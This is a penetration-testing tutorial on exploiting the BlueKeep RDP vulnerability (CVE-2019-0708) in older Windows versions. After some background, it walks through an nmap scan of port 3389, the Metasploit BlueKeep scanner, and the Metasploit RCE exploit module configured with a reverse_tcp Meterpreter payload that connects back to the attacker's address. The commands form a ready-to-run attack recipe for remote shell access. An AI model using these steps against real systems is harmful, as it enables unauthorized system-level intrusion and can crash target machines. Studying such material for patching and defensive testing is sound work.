# Exploiting Windows CVE-2019-0708 RDP Vulnerability (BlueKeep)

## CVE-2019-0708 - BlueKeep

* BlueKeep (CVE-2019-0708) is the name given to an RDP vulnerability in Windows that could potentially allow attackers to remotely execute arbitrary code and gain access to a Windows system and consequently the network that the target system is a part of.
* The BlueKeep vulnerability was made public by Microsoft in May 2019.
* The BlueKeep exploit takes advantage of a vulnerability in the Windows RDP protocol that allows attackers to gain access to a chunk of kernel memory consequently allowing them to remotely execute arbitrary code at the system level without authentication.
* Microsoft released a patch for this vulnerability on May 14th, 2019 and has urged companies to patch this vulnerability as soon as possible.
* At the time of discovery, about 1 million systems worldwide were found to be vulnerable.
* The BlueKeep vulnerability affects multiple versions of Windows:
  * XP
  * Vista
  * Windows 7
  * Windows Server 2008 & R2
* The BlueKeep vulnerability has various illegitimate PoC’s and exploit code that could be malicious in nature. It is therefore recommended to only utilize verified exploit code and modules for exploitation.
* The BlueKeep exploit has an MSF auxiliary module that can be used to check if a target system if vulnerable to the exploit and also has an exploit module that can be used to exploit the vulnerability on unpatched systems.
* The BlueKeep exploit module can be used to exploit vulnerable Windows systems and consequently provide us with a privileged meterpreter session on the target system.

**Note: Targeting Kernel space memory and applications can cause system crashes.**

## Attack Flow for the Windows CVE-2019-0708 RDP Vulnerability (BlueKeep)

## 1. **Confirm Presence of RDP**

**Objective:** Verify if the target system has RDP (Remote Desktop Protocol) enabled.

**Command:**

```bash
nmap -p 3389 <Target_IP>
```

**Description:** Use Nmap to scan port 3389 on the target system to check if RDP service is available.

## 2. **Assess BlueKeep Vulnerability**

**Objective:** Determine if the target system is vulnerable to the BlueKeep vulnerability (CVE-2019-0708).

**Command:**

```bash
msfconsole
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS <Target_IP>
run
```

**Description:** Use the `cve_2019_0708_bluekeep` scanner module in Metasploit to check if the target system is vulnerable to BlueKeep.

## 3. **Exploit BlueKeep Vulnerability**

**Objective:** Exploit the BlueKeep vulnerability to gain remote code execution on the target system.

**Command:**

```bash
msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS <Target_IP>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <Your_IP>
set LPORT <Your_Port>
exploit
```

**Description:** Use the `cve_2019_0708_bluekeep_rce` exploit module in Metasploit to exploit the vulnerability and establish a Meterpreter session.

**Note: Targeting Kernel space memory and applications can cause system crashes.**

***

***

***

**`Hacker's Mantra:`**`Everything about Mark Zuckerberg is pure hacker. Hackers don’t take realities of the world for granted; they seek to break and rebuild what they don’t like. They seek to outsmart the world. - Sarah Lacy`